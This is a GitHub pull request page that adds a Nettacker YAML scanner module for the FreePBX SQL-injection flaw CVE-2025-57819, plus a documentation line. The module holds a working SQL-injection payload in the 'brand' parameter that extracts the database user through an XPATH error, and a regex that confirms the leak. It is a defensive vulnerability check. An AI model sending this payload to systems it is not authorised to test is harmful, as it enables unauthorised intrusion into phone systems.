Skip to content

Add new vulnerability module for CVE-2025-57819 #1504

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
sankalp-b1401 wants to merge 4 commits into
base: master
Choose a base branch
from
Open

Add new vulnerability module for CVE-2025-57819 #1504

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
4 commits
Select commit Hold shift + click to select a range
ad1f08e
Added new vulnerability module for CVE-2025-57819
sankalp-b1401 Apr 6, 2026
5225b67
corrected user-agent placeholder
sankalp-b1401 Apr 8, 2026
bb64575
corrected user-agent placeholder spacing
sankalp-b1401 Apr 9, 2026
4010d6b
Merge branch 'master' into modules/vuln/sangoma_freepbx_cve_2025_57819
securestep9 Apr 9, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions docs/Modules.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -161,6 +161,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
- '**ProFTPd_integer_overflow_vuln**' - check ProFTPd for CVE-2011-1137
- '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
- '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
- '**sangoma_freepbx_cve_2025_57819_vuln**' - check target for CVE-2025-57819
Comment thread
sankalp-b1401 marked this conversation as resolved.
- '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
- '**smartermail_cve_2026_24423_vuln**' - check the target for SmarterMail CVE-2026-24423 vulnerability
- '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability
Expand Down
50 changes: 50 additions & 0 deletions nettacker/modules/vuln/sangoma_freepbx_cve_2025_57819.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
info:
name: sangoma_freepbx_cve_2025_57819_vuln
author: Sankalp Bansal
severity: 9.8
description: >
CVE-2025-57819 is a critical vulnerability in FreePBX 15, 16, 17.
Improper sanitization in the brand parameter of the endpoint
module leads to SQLi and Remote Code Execution possibly leading
to root privileges.
reference:
- https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/
- https://nvd.nist.gov/vuln/detail/CVE-2025-57819
- https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819/blob/main/README.md
profiles:
- vuln
- http
- critical_severity
- cve
- cve_2025
- sangoma
- freepbx
- cisa_kev

payloads:
- library: http
steps:
- method: get
timeout: 3
headers:
User-Agent: "{ user_agent }"
Comment thread
sankalp-b1401 marked this conversation as resolved.
Outdated
ssl: false
Comment thread
coderabbitai[bot] marked this conversation as resolved.
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x' AND EXTRACTVALUE(1,CONCAT('~USER:',(SELECT USER()),'~')) -- "
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
- "https"
ports:
- 80
- 443
response:
condition_type: and
conditions:
content:
regex: (?s)(?=.*XPATH syntax error.*~.*~)(?=.*utility\.functions\.php)(?=.*~USER:([^~]+)~)
reverse: false
Loading